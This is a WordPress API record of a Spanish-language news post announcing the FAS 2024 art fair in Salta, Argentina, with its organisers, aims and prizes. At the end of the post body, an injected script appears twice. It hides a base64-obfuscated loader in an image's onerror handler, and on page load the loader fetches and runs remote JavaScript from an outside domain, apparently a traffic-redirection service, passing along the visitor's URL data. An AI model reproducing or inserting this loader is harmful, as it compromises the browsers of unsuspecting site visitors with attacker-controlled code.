{"id":4220,"date":"2024-07-24T10:11:56","date_gmt":"2024-07-24T13:11:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4220"},"modified":"2025-08-13T23:52:18","modified_gmt":"2025-08-14T02:52:18","slug":"anunciaron-fas-2024-galerias-de-arte-ya-pueden-inscribirse-para-participar","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4220","title":{"rendered":"Anunciaron FAS 2024: Galer\u00edas de arte ya pueden inscribirse para participar"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-b6f12c9905c289b17baaf166e7054cdc\" style=\"background-color:#7c0623\"><em>Qued\u00f3 abierta la convocatoria de la Feria de Arte Salta (FAS) para galer\u00edas de arte del NOA, que representen a artistas del noroeste argentino.<\/em><\/h3>\n\n\n\n<p>Se llev\u00f3 a cabo el lanzamiento de FAS 2024, primera Feria de Arte de car\u00e1cter regional con sede en Salta, que se realizar\u00e1 del 1 al 4 de agosto pr\u00f3ximo. Participaron el&nbsp;secretario de Cultura,&nbsp;<strong>Diego Ashur,<\/strong>&nbsp;la&nbsp;subsecretaria de Patrimonio Cultural&nbsp;<strong>Claudia Lamas<\/strong>,&nbsp;integrantes de la Comisi\u00f3n Organizadora de FAS, galeristas, coleccionistas, artistas y medios de prensa.<\/p>\n\n\n\n<p>Se trata de una iniciativa de la Subsecretar\u00eda de Patrimonio Cultural de la Secretar\u00eda de Cultura, y el grupo ACCIONARTE de&nbsp;<strong>Virginia Blaquier<\/strong>,&nbsp;<strong>Esteban Drincovich<\/strong>&nbsp;y&nbsp;<strong>Alfredo Mu\u00f1oz<\/strong>. Tendr\u00e1 lugar en Punto Corp, un nuevo edificio en San Lorenzo Chico desarrollado por Proyecto Norte, que se suma para concretar proyectos que impacten en la escena art\u00edstica local.<\/p>\n\n\n\n<p>FAS 2024 est\u00e1 dirigida a galer\u00edas de arte de la Regi\u00f3n NOA y de cualquier parte del pa\u00eds que representen a artistas de las provincias que integran la Regi\u00f3n.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12354-anunciaron-fas-2024-galerias-de-arte-ya-pueden-inscribirse-para-participar-20240531112625.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12354-anunciaron-fas-2024-galerias-de-arte-ya-pueden-inscribirse-para-participar-20240531112625.jpg\" alt=\"Anunciaron FAS 2024: Galer\u00edas de arte ya pueden inscribirse para participar\"\/><\/a><\/figure>\n\n\n\n<p>En la ocasi\u00f3n, galeristas y artistas coincidieron en la importancia de crear y sostener espacios que permitan difundir el coleccionismo y activar la actividad econ\u00f3mica del sector, manifestando el deseo de trabajar en conjunto con ese fin.<\/p>\n\n\n\n<p>Al respecto, el secretario Cultura Diego Ashur asegur\u00f3 que la concreci\u00f3n de FAS es el resultado de \u00abla articulaci\u00f3n de los sectores p\u00fablico y privado en pos de ampliar y desarrollar un mercado para la potencia creativa de nuestros artistas, que son los verdaderos protagonistas de todo esto\u00bb. Destac\u00f3 como antecedente, la realizaci\u00f3n de Casas con Arte el a\u00f1o pasado, con gran \u00e9xito y r\u00e9cord de venta de obras de arte.&nbsp;<\/p>\n\n\n\n<p>En la misma l\u00ednea, la subsecretaria de Patrimonio Cultural Claudia Lamas, indic\u00f3: \u201cLa Feria ser\u00e1 un evento de gran importancia ya que es un sue\u00f1o cumplido para la comunidad art\u00edstica. Estar\u00e1 destinada a todos los p\u00fablicos, tanto al que ya conoce y se vincula al arte, como al que no. Es una puerta que abrimos para el disfrute y el consumo del arte, aspirando a que los artistas puedan vivir de su trabajo\u00bb.<\/p>\n\n\n\n<p>Todo ello se ve reflejado en los objetivos de esta Feria que son, principalmente: promover el arte y la cultura, apoyar a artistas locales y de la Regi\u00f3n, impulsar el turismo cultural, fomentar un mercado del arte, acercar al p\u00fablico a las expresiones culturales contempor\u00e1neas y posicionar a Salta como referente del arte contempor\u00e1neo.<\/p>\n\n\n\n<p><strong>Importantes premios<\/strong><br>En el lanzamiento, se inform\u00f3 adem\u00e1s que a lo largo de la Feria se entregar\u00e1n tres importantes premios para artistas y galer\u00edas: el premio In Situ, que fue creado por los coleccionistas Abel Guaglionone y Joaquin Rodr\u00edguez y que se entrega en cada edici\u00f3n de ArteBA; el premio Fausto para artistas emergentes de la Galer\u00eda tucumana Fausto, y el premio ACCIONARTE que van a entregar los coleccionistas salte\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12355-nunciaron-fas-2024-galerias-de-arte-ya-pueden-inscribirse-para-participar.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12355-nunciaron-fas-2024-galerias-de-arte-ya-pueden-inscribirse-para-participar.jpg\" alt=\"nunciaron FAS 2024: Galer\u00edas de arte ya pueden inscribirse para participar\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Anunciaron FAS 2024: Galer\u00edas de arte ya pueden inscribirse para participar\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/mDKORAH9fvk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><em>Fuente:\u00a0<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/em><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Qued\u00f3 abierta la convocatoria de la Feria de Arte Salta (FAS) para galer\u00edas de arte del NOA, que representen a artistas del noroeste argentino. Se llev\u00f3 a cabo el lanzamiento de FAS 2024, primera Feria de Arte de car\u00e1cter regional con sede en Salta, que se realizar\u00e1 del 1 al 4 de agosto pr\u00f3ximo. Participaron [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4221,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,18],"tags":[],"class_list":{"0":"post-4220","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4220"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4220"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4220\/revisions"}],"predecessor-version":[{"id":6734,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4220\/revisions\/6734"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4221"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4220"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}